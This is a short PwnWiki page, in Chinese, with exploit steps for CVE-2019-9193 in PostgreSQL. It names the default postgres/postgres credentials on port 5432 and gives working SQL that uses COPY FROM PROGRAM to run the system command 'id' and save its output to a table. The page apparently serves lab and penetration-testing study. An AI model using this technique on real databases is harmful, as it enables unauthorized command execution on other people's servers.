CVE-2019-9193 PostgreSQL 高權限命令執行漏洞

From PwnWiki
Revision as of 19:43, 7 April 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞利用== </translate> <translate> 啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese

漏洞利用

啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres, 連接到數據庫。 

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

FROM PROGRAM語句將執行命令id並將結果保存在cmd_exec表中。

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2019-9193_PostgreSQL_高權限命令執行漏洞&oldid=1124"